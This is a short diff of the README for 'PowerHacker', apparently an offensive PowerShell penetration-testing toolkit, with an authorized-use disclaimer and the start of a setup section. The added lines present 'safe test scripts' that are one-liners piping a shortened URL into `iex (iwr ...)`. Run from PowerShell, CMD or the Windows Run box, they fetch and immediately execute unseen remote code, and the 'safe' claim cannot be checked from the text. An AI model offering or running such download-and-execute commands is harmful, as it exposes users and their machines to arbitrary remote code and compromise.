pentestfunctions/powerhacker/README.md

 Security and ethical use are paramount.
 PowerHacker is intended for **authorized penetration testing** and/or **educational purposes only**.
 Misuse of PowerHacker may result in legal consequences.
 Ensure you have explicit permission to test target systems with PowerHacker.

+- Safe test scripts: Try run either of these in a command prompt or powershell respectively:

+1. In Powershell:
+  - `iex (iwr t.ly/YUz2A)`

+2. In CMD or press Windows key + R:
+  - `powershell iex (iwr t.ly/YUz2A)`

 ## :gear: Setup

 To leverage PowerHacker for your assessments: